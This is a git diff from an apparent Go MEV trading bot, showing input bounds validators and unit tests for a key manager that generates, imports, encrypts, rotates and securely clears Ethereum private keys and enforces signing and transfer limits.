||||
}
|
||||
}
|
||||
if repetitive && len(data) > 64 {
|
||||
result.Warnings = append(result.Warnings, "external data contains highly repetitive patterns")
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return result
|
||||
}
|
||||
|
||||
// ValidateArrayBounds validates array access bounds to prevent buffer overflows
|
||||
func (iv *InputValidator) ValidateArrayBounds(arrayLen, index int, operation string) *ValidationResult {
|
||||
result := &ValidationResult{Valid: true}
|
||||
|
||||
if arrayLen < 0 {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("negative array length %d in operation %s", arrayLen, operation))
|
||||
return result
|
||||
}
|
||||
|
||||
if index < 0 {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("negative array index %d in operation %s", index, operation))
|
||||
return result
|
||||
}
|
||||
|
||||
if index >= arrayLen {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("array index %d exceeds length %d in operation %s", index, arrayLen, operation))
|
||||
return result
|
||||
}
|
||||
|
||||
// Maximum reasonable array size (prevent DoS)
|
||||
const maxArraySize = 100000
|
||||
if arrayLen > maxArraySize {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("array length %d exceeds maximum %d in operation %s", arrayLen, maxArraySize, operation))
|
||||
return result
|
||||
}
|
||||
|
||||
return result
|
||||
}
|
||||
|
||||
// ValidateBufferAccess validates buffer access operations
|
||||
func (iv *InputValidator) ValidateBufferAccess(bufferSize, offset, length int, operation string) *ValidationResult {
|
||||
result := &ValidationResult{Valid: true}
|
||||
|
||||
if bufferSize < 0 {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("negative buffer size %d in operation %s", bufferSize, operation))
|
||||
return result
|
||||
}
|
||||
|
||||
if offset < 0 {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("negative buffer offset %d in operation %s", offset, operation))
|
||||
return result
|
||||
}
|
||||
|
||||
if length < 0 {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("negative buffer length %d in operation %s", length, operation))
|
||||
return result
|
||||
}
|
||||
|
||||
if offset+length > bufferSize {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("buffer access [%d:%d] exceeds buffer size %d in operation %s", offset, offset+length, bufferSize, operation))
|
||||
return result
|
||||
}
|
||||
|
||||
// Check for integer overflow in offset+length calculation
|
||||
if offset > 0 && length > 0 {
|
||||
// Use uint64 to detect overflow
|
||||
sum := uint64(offset) + uint64(length)
|
||||
if sum > uint64(^uint(0)>>1) { // Max int value
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("integer overflow in buffer access calculation: offset %d + length %d in operation %s", offset, length, operation))
|
||||
return result
|
||||
}
|
||||
}
|
||||
|
||||
return result
|
||||
}
|
||||
|
||||
// ValidateMemoryAllocation validates memory allocation requests
|
||||
func (iv *InputValidator) ValidateMemoryAllocation(size int, purpose string) *ValidationResult {
|
||||
result := &ValidationResult{Valid: true}
|
||||
|
||||
if size < 0 {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("negative memory allocation size %d for purpose %s", size, purpose))
|
||||
return result
|
||||
}
|
||||
|
||||
if size == 0 {
|
||||
result.Warnings = append(result.Warnings, fmt.Sprintf("zero memory allocation for purpose %s", purpose))
|
||||
return result
|
||||
}
|
||||
|
||||
// Set reasonable limits based on purpose
|
||||
limits := map[string]int{
|
||||
"transaction_data": 1024 * 1024, // 1MB
|
||||
"abi_decoding": 512 * 1024, // 512KB
|
||||
"log_message": 64 * 1024, // 64KB
|
||||
"swap_params": 4 * 1024, // 4KB
|
||||
"address_list": 100 * 1024, // 100KB
|
||||
"default": 256 * 1024, // 256KB
|
||||
}
|
||||
|
||||
limit, exists := limits[purpose]
|
||||
if !exists {
|
||||
limit = limits["default"]
|
||||
}
|
||||
|
||||
if size > limit {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("memory allocation size %d exceeds limit %d for purpose %s", size, limit, purpose))
|
||||
return result
|
||||
}
|
||||
|
||||
// Warn for large allocations
|
||||
if size > limit/2 {
|
||||
result.Warnings = append(result.Warnings, fmt.Sprintf("large memory allocation %d for purpose %s", size, purpose))
|
||||
}
|
||||
|
||||
return result
|
||||
}
|
||||
1846
orig/pkg/security/keymanager.go
Normal file
1846
orig/pkg/security/keymanager.go
Normal file
File diff suppressed because it is too large
Load Diff
244
orig/pkg/security/keymanager_private_key_test.go
Normal file
244
orig/pkg/security/keymanager_private_key_test.go
Normal file
@@ -0,0 +1,244 @@
|
||||
package security
|
||||
|
||||
import (
|
||||
"crypto/ecdsa"
|
||||
"crypto/rand"
|
||||
"math/big"
|
||||
"testing"
|
||||
|
||||
"github.com/ethereum/go-ethereum/crypto"
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
func TestEnhancedClearPrivateKey(t *testing.T) {
|
||||
// Generate test key
|
||||
key, err := ecdsa.GenerateKey(crypto.S256(), rand.Reader)
|
||||
require.NoError(t, err)
|
||||
require.NotNil(t, key)
|
||||
require.NotNil(t, key.D)
|
||||
|
||||
// Store original values for verification
|
||||
originalD := new(big.Int).Set(key.D)
|
||||
originalX := new(big.Int).Set(key.PublicKey.X)
|
||||
originalY := new(big.Int).Set(key.PublicKey.Y)
|
||||
|
||||
// Verify key has valid data before clearing
|
||||
assert.True(t, key.D.Sign() != 0)
|
||||
assert.True(t, key.PublicKey.X.Sign() != 0)
|
||||
assert.True(t, key.PublicKey.Y.Sign() != 0)
|
||||
|
||||
// Clear the key
|
||||
clearPrivateKey(key)
|
||||
|
||||
// Verify that the key data is effectively cleared
|
||||
assert.Nil(t, key.D, "D should be nil after clearing")
|
||||
assert.Nil(t, key.PublicKey.X, "X should be nil after clearing")
|
||||
assert.Nil(t, key.PublicKey.Y, "Y should be nil after clearing")
|
||||
assert.Nil(t, key.PublicKey.Curve, "Curve should be nil after clearing")
|
||||
|
||||
// Verify original values were actually non-zero
|
||||
assert.True(t, originalD.Sign() != 0, "Original D should have been non-zero")
|
||||
assert.True(t, originalX.Sign() != 0, "Original X should have been non-zero")
|
||||
assert.True(t, originalY.Sign() != 0, "Original Y should have been non-zero")
|
||||
}
|
||||
|
||||
func TestClearPrivateKeyNil(t *testing.T) {
|
||||
// Test that clearing a nil key doesn't panic
|
||||
clearPrivateKey(nil)
|
||||
// Should complete without error
|
||||
}
|
||||
|
||||
func TestClearPrivateKeyPartiallyNil(t *testing.T) {
|
||||
// Test key with some nil components
|
||||
key := &ecdsa.PrivateKey{}
|
||||
|
||||
// Should not panic with nil components
|
||||
clearPrivateKey(key)
|
||||
|
||||
// Test with only D set
|
||||
key.D = big.NewInt(12345)
|
||||
clearPrivateKey(key)
|
||||
assert.Nil(t, key.D)
|
||||
}
|
||||
|
||||
func TestSecureClearBigInt(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
value *big.Int
|
||||
}{
|
||||
{
|
||||
name: "small positive value",
|
||||
value: big.NewInt(12345),
|
||||
},
|
||||
{
|
||||
name: "large positive value",
|
||||
value: new(big.Int).SetBytes([]byte{0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF}),
|
||||
},
|
||||
{
|
||||
name: "negative value",
|
||||
value: big.NewInt(-9876543210),
|
||||
},
|
||||
{
|
||||
name: "zero value",
|
||||
value: big.NewInt(0),
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
// Create a copy to verify original was non-zero if applicable
|
||||
original := new(big.Int).Set(tt.value)
|
||||
|
||||
// Clear the value
|
||||
secureClearBigInt(tt.value)
|
||||
|
||||
// Verify it's cleared to zero
|
||||
assert.True(t, tt.value.Sign() == 0, "big.Int should be zero after clearing")
|
||||
assert.Equal(t, 0, tt.value.Cmp(big.NewInt(0)), "big.Int should equal zero")
|
||||
|
||||
// Verify original wasn't zero (except for zero test case)
|
||||
if tt.name != "zero value" {
|
||||
assert.True(t, original.Sign() != 0, "Original value should have been non-zero")
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestSecureClearBigIntNil(t *testing.T) {
|
||||
// Test that clearing nil doesn't panic
|
||||
secureClearBigInt(nil)
|
||||
// Should complete without error
|
||||
}
|
||||
|
||||
func TestSecureClearBytes(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
data []byte
|
||||
}{
|
||||
{
|
||||
name: "small byte slice",
|
||||
data: []byte{0x01, 0x02, 0x03, 0x04},
|
||||
},
|
||||
{
|
||||
name: "large byte slice",
|
||||
data: make([]byte, 1024),
|
||||
},
|
||||
{
|
||||
name: "empty byte slice",
|
||||
data: []byte{},
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
// Fill with non-zero data for large slice
|
||||
if len(tt.data) > 4 {
|
||||
for i := range tt.data {
|
||||
tt.data[i] = byte(i % 256)
|
||||
}
|
||||
}
|
||||
|
||||
// Store original to verify it had data
|
||||
original := make([]byte, len(tt.data))
|
||||
copy(original, tt.data)
|
||||
|
||||
// Clear the data
|
||||
secureClearBytes(tt.data)
|
||||
|
||||
// Verify all bytes are zero
|
||||
for i, b := range tt.data {
|
||||
assert.Equal(t, byte(0), b, "Byte at index %d should be zero", i)
|
||||
}
|
||||
|
||||
// For non-empty slices, verify original had some non-zero data
|
||||
if len(original) > 0 && len(original) <= 4 {
|
||||
hasNonZero := false
|
||||
for _, b := range original {
|
||||
if b != 0 {
|
||||
hasNonZero = true
|
||||
break
|
||||
}
|
||||
}
|
||||
if len(original) > 0 && tt.name != "empty byte slice" {
|
||||
assert.True(t, hasNonZero, "Original data should have had non-zero bytes")
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestMemorySecurityIntegration(t *testing.T) {
|
||||
// Test the complete workflow of key generation, usage, and clearing
|
||||
|
||||
// Generate multiple keys
|
||||
keys := make([]*ecdsa.PrivateKey, 10)
|
||||
for i := range keys {
|
||||
key, err := ecdsa.GenerateKey(crypto.S256(), rand.Reader)
|
||||
require.NoError(t, err)
|
||||
keys[i] = key
|
||||
}
|
||||
|
||||
// Verify all keys are valid
|
||||
for i, key := range keys {
|
||||
assert.NotNil(t, key.D, "Key %d D should not be nil", i)
|
||||
assert.True(t, key.D.Sign() != 0, "Key %d D should not be zero", i)
|
||||
}
|
||||
|
||||
// Clear all keys
|
||||
for i, key := range keys {
|
||||
clearPrivateKey(key)
|
||||
|
||||
// Verify clearing worked
|
||||
assert.Nil(t, key.D, "Key %d D should be nil after clearing", i)
|
||||
assert.Nil(t, key.PublicKey.X, "Key %d X should be nil after clearing", i)
|
||||
assert.Nil(t, key.PublicKey.Y, "Key %d Y should be nil after clearing", i)
|
||||
}
|
||||
}
|
||||
|
||||
func TestConcurrentKeyClearingOperation(t *testing.T) {
|
||||
// Test concurrent clearing operations
|
||||
const numKeys = 50
|
||||
const numWorkers = 10
|
||||
|
||||
keys := make([]*ecdsa.PrivateKey, numKeys)
|
||||
|
||||
// Generate keys
|
||||
for i := range keys {
|
||||
key, err := ecdsa.GenerateKey(crypto.S256(), rand.Reader)
|
||||
require.NoError(t, err)
|
||||
keys[i] = key
|
||||
}
|
||||
|
||||
// Channel to coordinate workers
|
||||
keysChan := make(chan *ecdsa.PrivateKey, numKeys)
|
||||
|
||||
// Send keys to channel
|
||||
for _, key := range keys {
|
||||
keysChan <- key
|
||||
}
|
||||
close(keysChan)
|
||||
|
||||
// Start workers to clear keys concurrently
|
||||
done := make(chan bool, numWorkers)
|
||||
for i := 0; i < numWorkers; i++ {
|
||||
go func() {
|
||||
defer func() { done <- true }()
|
||||
for key := range keysChan {
|
||||
clearPrivateKey(key)
|
||||
}
|
||||
}()
|
||||
}
|
||||
|
||||
// Wait for all workers to complete
|
||||
for i := 0; i < numWorkers; i++ {
|
||||
<-done
|
||||
}
|
||||
|
||||
// Verify all keys are cleared
|
||||
for i, key := range keys {
|
||||
assert.Nil(t, key.D, "Key %d D should be nil after concurrent clearing", i)
|
||||
assert.Nil(t, key.PublicKey.X, "Key %d X should be nil after concurrent clearing", i)
|
||||
assert.Nil(t, key.PublicKey.Y, "Key %d Y should be nil after concurrent clearing", i)
|
||||
}
|
||||
}
|
||||
829
orig/pkg/security/keymanager_test.go
Normal file
829
orig/pkg/security/keymanager_test.go
Normal file
@@ -0,0 +1,829 @@
|
||||
package security
|
||||
|
||||
import (
|
||||
"crypto/ecdsa"
|
||||
"math/big"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"github.com/ethereum/go-ethereum/common"
|
||||
"github.com/ethereum/go-ethereum/core/types"
|
||||
"github.com/ethereum/go-ethereum/crypto"
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/require"
|
||||
|
||||
"github.com/fraktal/mev-beta/internal/logger"
|
||||
)
|
||||
|
||||
// TestNewKeyManager tests the creation of a new KeyManager
|
||||
func TestNewKeyManager(t *testing.T) {
|
||||
// Test with valid configuration
|
||||
config := &KeyManagerConfig{
|
||||
KeystorePath: "/tmp/test_keystore",
|
||||
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
|
||||
}
|
||||
|
||||
log := logger.New("info", "text", "")
|
||||
km, err := newKeyManagerForTesting(config, log)
|
||||
|
||||
require.NoError(t, err)
|
||||
assert.NotNil(t, km)
|
||||
assert.NotNil(t, km.keystore)
|
||||
assert.NotNil(t, km.keys)
|
||||
assert.NotNil(t, km.encryptionKey)
|
||||
assert.Equal(t, config, km.config)
|
||||
|
||||
// Test with nil configuration (should use defaults with test encryption key)
|
||||
defaultConfig := &KeyManagerConfig{
|
||||
KeystorePath: "/tmp/test_default_keystore",
|
||||
EncryptionKey: "default_test_encryption_key_very_long_and_secure_32chars",
|
||||
}
|
||||
km2, err := newKeyManagerForTesting(defaultConfig, log)
|
||||
require.NoError(t, err)
|
||||
assert.NotNil(t, km2)
|
||||
assert.NotNil(t, km2.config)
|
||||
assert.NotEmpty(t, km2.config.KeystorePath)
|
||||
}
|
||||
|
||||
// TestNewKeyManagerInvalidConfig tests error cases for KeyManager creation
|
||||
func TestNewKeyManagerInvalidConfig(t *testing.T) {
|
||||
log := logger.New("info", "text", "")
|
||||
|
||||
// Test with empty encryption key
|
||||
config := &KeyManagerConfig{
|
||||
KeystorePath: "/tmp/test_keystore",
|
||||
EncryptionKey: "",
|
||||
}
|
||||
|
||||
km, err := newKeyManagerForTesting(config, log)
|
||||
assert.Error(t, err)
|
||||
assert.Nil(t, km)
|
||||
assert.Contains(t, err.Error(), "encryption key cannot be empty")
|
||||
|
||||
// Test with short encryption key
|
||||
config = &KeyManagerConfig{
|
||||
KeystorePath: "/tmp/test_keystore",
|
||||
EncryptionKey: "short",
|
||||
}
|
||||
|
||||
km, err = newKeyManagerForTesting(config, log)
|
||||
assert.Error(t, err)
|
||||
assert.Nil(t, km)
|
||||
assert.Contains(t, err.Error(), "encryption key must be at least 32 characters")
|
||||
|
||||
// Test with empty keystore path
|
||||
config = &KeyManagerConfig{
|
||||
KeystorePath: "",
|
||||
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
|
||||
}
|
||||
|
||||
km, err = newKeyManagerForTesting(config, log)
|
||||
assert.Error(t, err)
|
||||
assert.Nil(t, km)
|
||||
assert.Contains(t, err.Error(), "keystore path cannot be empty")
|
||||
}
|
||||
|
||||
// TestGenerateKey tests key generation functionality
|
||||
func TestGenerateKey(t *testing.T) {
|
||||
config := &KeyManagerConfig{
|
||||
KeystorePath: "/tmp/test_keystore_generate",
|
||||
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
|
||||
}
|
||||
|
||||
log := logger.New("info", "text", "")
|
||||
km, err := newKeyManagerForTesting(config, log)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Test generating a trading key
|
||||
permissions := KeyPermissions{
|
||||
CanSign: true,
|
||||
CanTransfer: true,
|
||||
MaxTransferWei: big.NewInt(1000000000000000000), // 1 ETH
|
||||
}
|
||||
|
||||
address, err := km.GenerateKey("trading", permissions)
|
||||
require.NoError(t, err)
|
||||
assert.NotEqual(t, common.Address{}, address)
|
||||
|
||||
// Verify the key exists
|
||||
keyInfo, err := km.GetKeyInfo(address)
|
||||
require.NoError(t, err)
|
||||
assert.Equal(t, address, keyInfo.Address)
|
||||
assert.Equal(t, "trading", keyInfo.KeyType)
|
||||
assert.Equal(t, permissions, keyInfo.Permissions)
|
||||
assert.WithinDuration(t, time.Now(), keyInfo.CreatedAt, time.Second)
|
||||
assert.WithinDuration(t, time.Now(), keyInfo.GetLastUsed(), time.Second)
|
||||
assert.Equal(t, int64(0), keyInfo.GetUsageCount())
|
||||
|
||||
// Test generating an emergency key (should have expiration)
|
||||
emergencyAddress, err := km.GenerateKey("emergency", permissions)
|
||||
require.NoError(t, err)
|
||||
assert.NotEqual(t, common.Address{}, emergencyAddress)
|
||||
|
||||
emergencyKeyInfo, err := km.GetKeyInfo(emergencyAddress)
|
||||
require.NoError(t, err)
|
||||
assert.NotNil(t, emergencyKeyInfo.ExpiresAt)
|
||||
assert.True(t, emergencyKeyInfo.ExpiresAt.After(time.Now()))
|
||||
}
|
||||
|
||||
// TestImportKey tests key import functionality
|
||||
func TestImportKey(t *testing.T) {
|
||||
config := &KeyManagerConfig{
|
||||
KeystorePath: "/tmp/test_keystore_import",
|
||||
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
|
||||
}
|
||||
|
||||
log := logger.New("info", "text", "")
|
||||
km, err := newKeyManagerForTesting(config, log)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Generate a test private key
|
||||
privateKey, err := crypto.GenerateKey()
|
||||
require.NoError(t, err)
|
||||
privateKeyHex := common.Bytes2Hex(crypto.FromECDSA(privateKey))
|
||||
|
||||
// Import the key
|
||||
permissions := KeyPermissions{
|
||||
CanSign: true,
|
||||
CanTransfer: false,
|
||||
MaxTransferWei: nil,
|
||||
}
|
||||
|
||||
address, err := km.ImportKey(privateKeyHex, "test", permissions)
|
||||
require.NoError(t, err)
|
||||
assert.NotEqual(t, common.Address{}, address)
|
||||
|
||||
// Verify the imported key
|
||||
keyInfo, err := km.GetKeyInfo(address)
|
||||
require.NoError(t, err)
|
||||
assert.Equal(t, address, keyInfo.Address)
|
||||
assert.Equal(t, "test", keyInfo.KeyType)
|
||||
assert.Equal(t, permissions, keyInfo.Permissions)
|
||||
|
||||
// Test importing invalid key
|
||||
_, err = km.ImportKey("invalid_private_key", "test", permissions)
|
||||
assert.Error(t, err)
|
||||
assert.Contains(t, err.Error(), "invalid private key")
|
||||
|
||||
// Test importing duplicate key
|
||||
_, err = km.ImportKey(privateKeyHex, "duplicate", permissions)
|
||||
assert.Error(t, err)
|
||||
assert.Contains(t, err.Error(), "key already exists")
|
||||
}
|
||||
|
||||
// TestListKeys tests key listing functionality
|
||||
func TestListKeys(t *testing.T) {
|
||||
config := &KeyManagerConfig{
|
||||
KeystorePath: "/tmp/test_keystore_list",
|
||||
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
|
||||
}
|
||||
|
||||
log := logger.New("info", "text", "")
|
||||
km, err := newKeyManagerForTesting(config, log)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Initially should be empty
|
||||
keys := km.ListKeys()
|
||||
assert.Empty(t, keys)
|
||||
|
||||
// Generate a few keys
|
||||
permissions := KeyPermissions{CanSign: true}
|
||||
addr1, err := km.GenerateKey("test1", permissions)
|
||||
require.NoError(t, err)
|
||||
|
||||
addr2, err := km.GenerateKey("test2", permissions)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Check that both keys are listed
|
||||
keys = km.ListKeys()
|
||||
assert.Len(t, keys, 2)
|
||||
assert.Contains(t, keys, addr1)
|
||||
assert.Contains(t, keys, addr2)
|
||||
}
|
||||
|
||||
// TestGetKeyInfo tests key information retrieval
|
||||
func TestGetKeyInfo(t *testing.T) {
|
||||
config := &KeyManagerConfig{
|
||||
KeystorePath: "/tmp/test_keystore_info",
|
||||
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
|
||||
}
|
||||
|
||||
log := logger.New("info", "text", "")
|
||||
km, err := newKeyManagerForTesting(config, log)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Generate a key
|
||||
permissions := KeyPermissions{CanSign: true, CanTransfer: true}
|
||||
address, err := km.GenerateKey("test", permissions)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Get key info
|
||||
keyInfo, err := km.GetKeyInfo(address)
|
||||
require.NoError(t, err)
|
||||
assert.Equal(t, address, keyInfo.Address)
|
||||
assert.Equal(t, "test", keyInfo.KeyType)
|
||||
assert.Equal(t, permissions, keyInfo.Permissions)
|
||||
// EncryptedKey should be nil in the returned info for security
|
||||
assert.Nil(t, keyInfo.EncryptedKey)
|
||||
|
||||
// Test getting non-existent key
|
||||
nonExistentAddr := common.HexToAddress("0x1234567890123456789012345678901234567890")
|
||||
_, err = km.GetKeyInfo(nonExistentAddr)
|
||||
assert.Error(t, err)
|
||||
assert.Contains(t, err.Error(), "key not found")
|
||||
}
|
||||
|
||||
// TestEncryptDecryptPrivateKey tests the encryption/decryption functionality
|
||||
func TestEncryptDecryptPrivateKey(t *testing.T) {
|
||||
config := &KeyManagerConfig{
|
||||
KeystorePath: "/tmp/test_keystore_encrypt",
|
||||
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
|
||||
}
|
||||
|
||||
log := logger.New("info", "text", "")
|
||||
km, err := newKeyManagerForTesting(config, log)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Generate a test private key
|
||||
privateKey, err := crypto.GenerateKey()
|
||||
require.NoError(t, err)
|
||||
|
||||
// Test encryption
|
||||
encryptedKey, err := km.encryptPrivateKey(privateKey)
|
||||
require.NoError(t, err)
|
||||
assert.NotNil(t, encryptedKey)
|
||||
assert.NotEmpty(t, encryptedKey)
|
||||
|
||||
// Test decryption
|
||||
decryptedKey, err := km.decryptPrivateKey(encryptedKey)
|
||||
require.NoError(t, err)
|
||||
assert.NotNil(t, decryptedKey)
|
||||
|
||||
// Verify the keys are the same
|
||||
assert.Equal(t, crypto.PubkeyToAddress(privateKey.PublicKey), crypto.PubkeyToAddress(decryptedKey.PublicKey))
|
||||
assert.Equal(t, crypto.FromECDSA(privateKey), crypto.FromECDSA(decryptedKey))
|
||||
|
||||
// Test decryption with invalid data
|
||||
_, err = km.decryptPrivateKey([]byte("x")) // Very short data to trigger "encrypted key too short"
|
||||
assert.Error(t, err)
|
||||
assert.Contains(t, err.Error(), "encrypted key too short")
|
||||
}
|
||||
|
||||
// TestRotateKey tests key rotation functionality
|
||||
func TestRotateKey(t *testing.T) {
|
||||
config := &KeyManagerConfig{
|
||||
KeystorePath: "/tmp/test_keystore_rotate",
|
||||
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
|
||||
}
|
||||
|
||||
log := logger.New("info", "text", "")
|
||||
km, err := newKeyManagerForTesting(config, log)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Generate an original key
|
||||
permissions := KeyPermissions{CanSign: true, CanTransfer: true}
|
||||
originalAddr, err := km.GenerateKey("test", permissions)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Rotate the key
|
||||
newAddr, err := km.RotateKey(originalAddr)
|
||||
require.NoError(t, err)
|
||||
assert.NotEqual(t, originalAddr, newAddr)
|
||||
|
||||
// Check that the original key still exists but has restricted permissions
|
||||
originalInfo, err := km.GetKeyInfo(originalAddr)
|
||||
require.NoError(t, err)
|
||||
assert.False(t, originalInfo.Permissions.CanSign)
|
||||
assert.False(t, originalInfo.Permissions.CanTransfer)
|
||||
|
||||
// Check that the new key has the same permissions
|
||||
newInfo, err := km.GetKeyInfo(newAddr)
|
||||
require.NoError(t, err)
|
||||
assert.Equal(t, permissions, newInfo.Permissions)
|
||||
assert.True(t, newInfo.Permissions.CanSign)
|
||||
assert.True(t, newInfo.Permissions.CanTransfer)
|
||||
|
||||
// Test rotating non-existent key
|
||||
nonExistentAddr := common.HexToAddress("0x1234567890123456789012345678901234567890")
|
||||
_, err = km.RotateKey(nonExistentAddr)
|
||||
assert.Error(t, err)
|
||||
assert.Contains(t, err.Error(), "key not found")
|
||||
}
|
||||
|
||||
// TestSignTransaction tests transaction signing with various scenarios
|
||||
func TestSignTransaction(t *testing.T) {
|
||||
config := &KeyManagerConfig{
|
||||
KeystorePath: "/tmp/test_keystore_sign",
|
||||
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
|
||||
}
|
||||
|
||||
log := logger.New("info", "text", "")
|
||||
km, err := newKeyManagerForTesting(config, log)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Generate a key with signing permissions
|
||||
permissions := KeyPermissions{
|
||||
CanSign: true,
|
||||
CanTransfer: true,
|
||||
MaxTransferWei: big.NewInt(1000000000000000000), // 1 ETH (safe int64 value)
|
||||
}
|
||||
signerAddr, err := km.GenerateKey("signer", permissions)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Create a test transaction using Arbitrum chain ID (EIP-155 transaction)
|
||||
chainID := big.NewInt(42161) // Arbitrum One
|
||||
|
||||
// Create transaction data for EIP-155 transaction
|
||||
toAddr := common.HexToAddress("0x1234567890123456789012345678901234567890")
|
||||
value := big.NewInt(1000000000000000000) // 1 ETH
|
||||
gasLimit := uint64(21000)
|
||||
gasPrice := big.NewInt(20000000000) // 20 Gwei
|
||||
nonce := uint64(0)
|
||||
|
||||
// Create DynamicFeeTx (EIP-1559) which properly handles chain ID
|
||||
tx := types.NewTx(&types.DynamicFeeTx{
|
||||
ChainID: chainID,
|
||||
Nonce: nonce,
|
||||
To: &toAddr,
|
||||
Value: value,
|
||||
Gas: gasLimit,
|
||||
GasFeeCap: gasPrice,
|
||||
GasTipCap: big.NewInt(1000000000), // 1 Gwei tip
|
||||
Data: nil,
|
||||
})
|
||||
|
||||
// Create signing request
|
||||
request := &SigningRequest{
|
||||
Transaction: tx,
|
||||
ChainID: chainID,
|
||||
From: signerAddr,
|
||||
Purpose: "Test transaction",
|
||||
UrgencyLevel: 3,
|
||||
}
|
||||
|
||||
// Sign the transaction
|
||||
result, err := km.SignTransaction(request)
|
||||
require.NoError(t, err)
|
||||
assert.NotNil(t, result)
|
||||
assert.NotNil(t, result.SignedTx)
|
||||
assert.NotNil(t, result.Signature)
|
||||
assert.NotEmpty(t, result.AuditID)
|
||||
assert.WithinDuration(t, time.Now(), result.SignedAt, time.Second)
|
||||
assert.Equal(t, signerAddr, result.KeyUsed)
|
||||
|
||||
// Verify the signature is valid
|
||||
signedTx := result.SignedTx
|
||||
// Use appropriate signer based on transaction type
|
||||
var signer types.Signer
|
||||
switch signedTx.Type() {
|
||||
case types.LegacyTxType:
|
||||
signer = types.NewEIP155Signer(chainID)
|
||||
case types.DynamicFeeTxType:
|
||||
signer = types.NewLondonSigner(chainID)
|
||||
default:
|
||||
t.Fatalf("Unsupported transaction type: %d", signedTx.Type())
|
||||
}
|
||||
from, err := types.Sender(signer, signedTx)
|
||||
require.NoError(t, err)
|
||||
assert.Equal(t, signerAddr, from)
|
||||
|
||||
// Test signing with non-existent key
|
||||
nonExistentAddr := common.HexToAddress("0x1234567890123456789012345678901234567890")
|
||||
request.From = nonExistentAddr
|
||||
_, err = km.SignTransaction(request)
|
||||
assert.Error(t, err)
|
||||
assert.Contains(t, err.Error(), "key not found")
|
||||
|
||||
// Test signing with key that can't sign
|
||||
km2, err := newKeyManagerForTesting(config, log)
|
||||
require.NoError(t, err)
|
||||
|
||||
noSignPermissions := KeyPermissions{
|
||||
CanSign: false,
|
||||
CanTransfer: true,
|
||||
MaxTransferWei: big.NewInt(1000000000000000000), // 1 ETH (safe int64 value)
|
||||
}
|
||||
noSignAddr, err := km2.GenerateKey("no_sign", noSignPermissions)
|
||||
require.NoError(t, err)
|
||||
|
||||
request.From = noSignAddr
|
||||
_, err = km2.SignTransaction(request)
|
||||
assert.Error(t, err)
|
||||
assert.Contains(t, err.Error(), "not permitted to sign")
|
||||
}
|
||||
|
||||
// TestSignTransactionTransferLimits tests transfer limits during signing
|
||||
func TestSignTransactionTransferLimits(t *testing.T) {
|
||||
config := &KeyManagerConfig{
|
||||
KeystorePath: "/tmp/test_keystore_limits",
|
||||
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
|
||||
}
|
||||
|
||||
log := logger.New("info", "text", "")
|
||||
km, err := newKeyManagerForTesting(config, log)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Generate a key with limited transfer permissions
|
||||
maxTransfer := big.NewInt(1000000000000000000) // 1 ETH
|
||||
permissions := KeyPermissions{
|
||||
CanSign: true,
|
||||
CanTransfer: true,
|
||||
MaxTransferWei: maxTransfer,
|
||||
}
|
||||
signerAddr, err := km.GenerateKey("limited_signer", permissions)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Create a transaction that exceeds the limit
|
||||
chainID := big.NewInt(1)
|
||||
excessiveTx := types.NewTransaction(0, common.Address{}, big.NewInt(2000000000000000000), 21000, big.NewInt(20000000000), nil) // 2 ETH
|
||||
|
||||
request := &SigningRequest{
|
||||
Transaction: excessiveTx,
|
||||
ChainID: chainID,
|
||||
From: signerAddr,
|
||||
Purpose: "Excessive transfer",
|
||||
UrgencyLevel: 3,
|
||||
}
|
||||
|
||||
_, err = km.SignTransaction(request)
|
||||
assert.Error(t, err)
|
||||
assert.Contains(t, err.Error(), "transfer amount exceeds limit")
|
||||
}
|
||||
